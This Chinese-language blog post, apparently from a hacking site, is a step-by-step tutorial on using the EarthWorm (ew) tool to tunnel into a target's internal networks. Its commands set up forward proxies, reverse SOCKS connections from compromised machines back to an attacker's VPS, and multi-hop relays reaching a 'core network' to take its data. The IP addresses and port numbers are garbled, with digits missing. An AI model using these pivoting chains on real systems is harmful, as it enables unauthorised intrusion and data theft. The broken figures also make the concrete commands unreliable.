利用ew轻松穿透多级目标内网

  • 内容
  • 相关
0x0 ew 快速穿透目标内网:

  简要环境说明:

win008R 假设为目标边界web服务器,可正常访问公网
假设其公网ip为 9.68..
假设其内网ip为 9.68..

win008 假设为目标内网数据库服务器,可正常访问公网
假设其内网ip为 9.68..70


win7 假设为自己公网的vps,没有dns不能访问公网
假设其公网ip为 9.68..


centos 5. 假设为目标内网的一台linux机器
假设其内网ip为 9.68..69


0x0 首先,利用ew做最简单的正向代理,其实就是大家最常用的所谓的ss:
  在 win008R 机器上执行


# ew_for_Win.exe -s ssocksd -l 080

  在win7上打开Proxifier根据上面监听的端口建立正常的socks代理即可



0x0 假设目标机器处在内网[没有公网ip,但可以访问公网],我们也可以利用ew进行反向socks5代理,然后直接在vps上就可以很方便的访问目标内网中的所有机器了:
  先在 win7上执行,等待目标反弹连接


# ew_for_Win.exe -s rcsocks -l 080 -e 4
  在 win008上执行,反弹socks5连接


# ew_for_Win.exe -s  rssocks -d 9.68.. -e 4



0x04 实现复杂内网环境下的跨网段多级穿透:
  第一种场景,内网机器不能访问公网,可通过能访问公网的机器把内网不能访问公网机器带出来,比较简单,如下:

假设win008处在目标内网且不能访问公网但可以访问内网中的资源
而win008R这台机器上虽然有内网ip,但不能访问内网资源,好在win008R可以访问win008
这时我们想获取内网资源就可以这样干,先在win008上开启socks代理服务,然后再在DMZ的win008R连上内网的win008的socks服务
最后,通过win008上的socks服务我们就可以轻松访问另外一个目标内网段了,具体实现过程如下
  首先,在win008上执行,意思就是在本地建立socks5代理,端口为080


# ew_for_Win.exe -s ssocksd -l 080

  在到DMZ的win008R上执行,意思就是把来自外部的090端口的流量转到内网9.68..70这台机器的080端口上


# ew_for_Win.exe -s lcx_tran -l 090 -f 9.68..70 -g 080

  最后,再回到win7[vps]上去利用Proxifier建立正常的socks代理访问090端口即可,访问vps的090就相当于访问内网win008的080端口

第二种场景,还是有些机器不能访问公网的情况:


假设win008在内网且能访问公网但不能访问内网资源,而centos 5.能访问内网资源但却无法访问公网,而win008可以访问centos 5.
这试,我们要想获取内网资源,就可以通过win008在centos 5.和win7[vps]之间建立一条socks5通道,实现过程比较简单,如下
  首先,在win7[实际中的vps]上执行,把来自外部的080端口的流量转到本地的79端口上

# ew_for_Win.exe -s lcx_listen -l 080 -e 79

  此时回到centos 5.上执行,在本地启动socks5代理并监听45端口

# chmod +x ew_for_Linux

# ./ew_for_Linux -s ssocksd -l 45

  然后再到win008上去执行,意思就是把win7[vps]的79端口和centos 5.的45进行绑定,即建立socks5通道


# ew_for_Win.exe -s lcx_slave -d 9.68.. -e 79 -f 9.68..69 -g 45

  最后,在回到win7[vps]建立正常的socks代理访问即可,实际上就相当于访问win7的080就相当于访问centos 5.的45端口,通过这种方式一样也可以把整个目标内网代理出来

第三种场景,多级内网轻松穿透:

假设win008R在内网[无公网ip]并在一个独立的内网段,win008也处在目标内网,假设在另一个内网段,centos 5.同样也处在内网,可又在另一个单独的内网段
且win008R能访问win008,win008能访问centos 5.,而centos 5.能访问目标核心网,要实现层层穿访问核心网资源,透我们就可以这样
  先在win7[vps]上执行,把来自外部的080端口流量转到本地的5端口上

# ew_for_Win.exe -s rcsocks -l 080 -e 5

  在win008R上执行,把win7[vps]的5端口和内网win008的456端口绑定

# ew_for_Win.exe -s lcx_slave -d 9.68.. -e 5 -f 9.68..70 -g 456

  在win008上执行,将来自外部的6端口和本地的456端口进行绑定

# ew_for_Win.exe -s lcx_listen -l 456 -e 6

  在centos 5.上执行,将本地的socks连接反弹到win008的6端口上,此时再回到win008上看会提示”rssocks cmd_socket OK!”,说明通道已经建立成功

# ./ew_for_Linux -s rssocks -d 9.68..70 -e 6

  最后,再回到win7[vps]上利用Proxifier访问本地的080就相当于访问centos 5.的6端口,即可轻松获取核心网的数据

点我看原文

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:利用ew轻松穿透多级目标内网 - https://www.0dayhack.com/post-695.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注